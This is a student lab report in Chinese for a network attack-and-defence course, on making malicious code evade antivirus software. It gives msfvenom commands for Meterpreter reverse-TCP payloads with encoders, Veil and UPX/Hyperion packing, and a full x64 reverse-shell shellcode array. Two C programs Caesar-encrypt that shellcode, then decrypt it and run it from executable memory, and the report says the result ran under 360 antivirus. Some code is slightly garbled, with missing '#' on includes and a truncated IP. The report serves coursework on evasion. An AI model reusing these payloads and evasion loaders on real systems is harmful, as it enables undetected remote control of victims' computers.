20222312 2024-2025-1 《网络与系统攻防技术》实验三实验报告
一、实验目的
本次实验目的为通过多次加密、文件格式欺骗、填充、加壳等技术手段实现恶意代码免杀,产生恶意程序,并尝试通过杀毒软件,不被杀毒软件检测出来。
二、实验内容
1.正确使用msf编码器,使用msfvenom生成如jar之类的其他文件;
2.能够使用veil,加壳工具;
3.能够使用C + shellcode编程;
4.能够通过组合应用各种技术实现恶意代码免杀;
5.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。
- 杀软是如何检测出恶意代码的?
杀软(杀毒软件)主要通过以下几种方式检测恶意代码:
特征码检测:利用已知恶意软件的特征(如特征码、哈希值)进行比对,查找文件或程序中是否包含这些特征。
启发式分析:通过行为分析和代码分析,识别潜在的恶意行为或可疑代码结构,即使这些代码未被明确标记为恶意。
实时监控:监控文件系统、进程和网络活动,及时发现和阻止可疑活动。
云检测:将文件上传到云端进行分析,通过大数据和机器学习技术检测未知威胁。
2. 免杀是做什么?
免杀是指通过各种技术手段使得恶意代码能够躲避杀软的检测和拦截。这通常用于黑客和恶意软件开发者希望隐藏其恶意行为,以便在目标系统上执行。
- 免杀的基本方法有哪些?
免杀的基本方法包括:
代码混淆:通过修改代码结构,使其难以识别,同时保持功能不变。例如,使用加密、压缩或变形技术。
反沙箱技术:检测环境是否为沙箱(虚拟化环境)并调整行为,避免在被监测的环境中运行。
多态性和变种技术:不断生成新的代码变种,利用多态性来逃避静态分析检测。
利用合法程序:通过伪装成合法程序或利用系统的合法功能,降低被识别的风险。
时间延迟和动态加载:在执行前引入延迟,或将恶意代码分散在多个文件中,动态加载时再进行实际的恶意操作。
这些方法旨在提高恶意软件的生存能力和隐蔽性。
- 使用msfvenom生成jar等文件。
查看 msfvenom 支持的所有输出格式:输入msfvenom --list formats;
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.132 LPORT=1313 -f exe > 20222312zhx.exe,生成payload;
-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型,是一个 Meterpreter 反向 TCP 连接;
LHOST=192.168.126.132设置了连接回的本地 IP 地址,即kali虚拟机的 IP 地址;
LPORT=1313设置了连接回的本地端口号,这里为学号后四位;
-f exe: 这指定了输出格式为 Windows 可执行文件;
查看 msfvenom 支持的所有编码方式:输入msfvenom --list encoders;
使用编码器对payload进行编码,输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.126.132 LPORT=1313 -f exe > 202222312zhx-2.exe;
-e x86/shikata_ga_nai: 这指定了要使用的编码器;
-b ‘\x00’: 这指定了需要避免的坏字符集;
LHOST、LPORT同上;
多次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.18 LPORT=1313 -f exe > 202222312zhx-3.exe;
-i 10表示编码10次;
选择一个适用于Java环境的payload来生成jar文件:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.126.132 LPORT=1313 -f jar > 202222312zhx-4.jar;
使用编码器对payload进行编码:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.188.1 LPORT=1313 -e x86/shikata_ga_nai -i 10 -f jar > 202222312zhx-5.jar;
使用编码器对payload进行编码,输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.188.1 LPORT=1313 -f exe > 202222312zhx-2.exe;
-e x86/shikata_ga_nai: 这指定了要使用的编码器;
-b ‘\x00’: 这指定了需要避免的坏字符集;
LHOST、LPORT同上;
对于生成的文件直接将其通过拖动的方式转到电脑上
打开VirusTotal的链接https://www.virustotal.com/ http://www.virscan.org/,放入文件,使用VirusTotal进行检测;
2.使用veil工具
安装veil,需要保持虚拟机是联网状态,依次输入以下命令:
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
当输入完sudo apt-get install wine32后报错,此时先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可;
再依次输入:
apt-get install veil ——安装veil
sudo su
cd /usr/share/veil/config/
vim setup.sh
同样,将20222312_veil.exe文件移入共享文件夹,在主机上打开链接https://www.virustotal.com/ http://www.virscan.org/,放入文件,使用VirusTotal进行检测;
3.使用C + shellcode编程
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.134 LPORT=1313 -f c,其中LHOST为反弹回连的IP,即Kali的IP,这里不用联网,所以我用的还是原来的虚拟机;
按ESC键,输入:wq退出编辑;
输入i686-w64-mingw32-g++ 20222312.c -o 20222312.exe;
同样,将20222312.exe文件移入共享文件夹,在主机上打开链接https://www.virustotal.com/ http://www.virscan.org/,放入文件,使用VirusTotal进行检测;
4.加壳
upx加壳:输入upx 20221313.exe -o upx20221313.exe;
hyperion加壳:
输入cp upx20221313.exe /usr/share/windows-resources/hyperion;
输入cd /usr/share/windows-resources/hyperion进入文件夹;
输入ls查看生成的可执行文件;
输入wine hyperion.exe -v upx20222312.exe upx20181321hy.exe
同样,将upx20222312.exe文件移入共享文件夹,在主机上打开链接https://www.virustotal.com/ http://www.virscan.org/,放入文件,使用VirusTotal进行检测;
5.通过组合应用各种技术实现恶意代码免杀
组合技术:msfvenom生成Shellcode数组,再使用凯撒加密对数组进行加密,将加密后的密文放入txt文件中,再编写C语言代码,从txt文件中读取密文,解密并运行Shellcode,最后生成.exe可执行文件。
kali虚拟机中通过msfvenom生成Shellcode数组,代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.76.128 LPORT=10086 -f c;
将buf[]中的内容复制;
将得到的程序在codeblock中运行
代码如下:
include <stdio.h>
include<string.h>
//凯撒加密函数,适用于unsigned char数组
void caesarEncrypt(unsigned char *data, size_t length, int shift) {
for (size_t i = 0; i < length; i++) {
// 对每个字节进行位移
data[i]= (data[i] + shift) & 0xFF;
}
}
int main( ) {
unsigned char shellcode1[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"
"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"
"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x41\x51\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50\x8b\x48\x18\x49"
"\x01\xd0\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x27\x66\xc0\xa8\x4c\x80\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";
int shift =3; // 加密位移
printf("original: ");
for (size_t i = 0; i < 510; i++) {
printf("\x%02x",shellcode1[i]);
}
printf("\n");
caesarEncrypt(shellcode1,510,shift);
printf("Encrypted:");
for (size_t i =0;i< 510; i++){
printf("\x%02x",shellcode1[i]);
}
printf("\n");
FILE *file = fopen("1313jiami.txt", "w");
if (file != NULL) {
for (size_t i = 0; i < 510; i++) {
fprintf(file, "\x%02x", shellcode1[i]);
}
fprintf(file, "\n");
fclose(file);
} else {
printf("Error opening file!\n");
}
return 0;
}
编辑并运行该文件;
新建20222312.cpp文件,输入代码,代码功能为读取20222312zhx.txt文件中的内容到shellcode1[]数组中,并进行解密,再运行shellcode;
代码如下:
include <windows.h>
include <stdio.h>
include <stdlib.h>
include <string.h>
// 凯撒解密函数,适用于unsigned char数组
void caesarDecrypt(unsigned char *data, size_t length, int shift) {
for (size_t i = 0; i < length; i++) {
// 对每个字节进行位移
data[i] = (unsigned char)((data[i] - shift + 256) % 256);
}
}
int main() {
int shift = 3; // 凯撒加密的位移值
unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节
char line[1024]; // 用于读取文件的临时缓冲区
// 打开文件
FILE *file = fopen("20222312zhx.txt", "r");
if (file == NULL) {
perror("Error opening file");
return 1;
}
// 读取文件内容到shellcode1数组中
size_t length = 0;
while (fgets(line, sizeof(line), file)) {
// 将读取的十六进制字符串转换为字节并存储在shellcode1中
for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {
if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {
length++;
}
}
}
fclose(file);
// 解密shellcode
caesarDecrypt(shellcode1, length, shift);
// 输出解密后的shellcode
/*printf("Decrypted Shellcode:\n");
for (size_t i = 0; i < 510; i++) {
printf("\\x%02x", shellcode1[i]);
}
printf("\n");*/
// 分配内存并设置为可执行
LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// 将解密后的shellcode复制到分配的内存中
memcpy(exec, shellcode1, sizeof shellcode1);
// 执行shellcode
((void(*)())exec)();
return 0;
}
下载360安全卫士,查看防火墙的状态,发现可以与杀软共生;
五、实验中遇到的问题及解决
问题1:安装veil时,多次报错,一直显示安装不成功。
解决:通过上网查阅资料,先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可,对于第二次报错,输入sudo /usr/share/veil/config/setup.sh --force --silent,继续安装,同时在安装中还出现了显示虚拟机内存不足的问题,需要在重装虚拟机的时候调整内存,同时调整文件安装的路径。
问题2:在通过共享文件夹将虚拟机文件传到主机上时,共享文件夹无法正常使用,由于一开始使用的是VirtualBox虚拟机,无法使用拖拽的方式传输文件。
解决:在VMware上重新安装虚拟机后可以使用拖拽的方式传输文件。
问题3:传输过来的文件多次被杀毒软件直接查杀,由于防火墙的设置,恢复后也使得文件无法正常使用。
解决:查询相关步骤对防火墙设置进行调整,同时对部分杀毒软件进行删除后可以执行
问题4:在msfconsole后无法成功运行。
解决:输入的端口号已经被占用,在重新更换端口号之后可以运行。
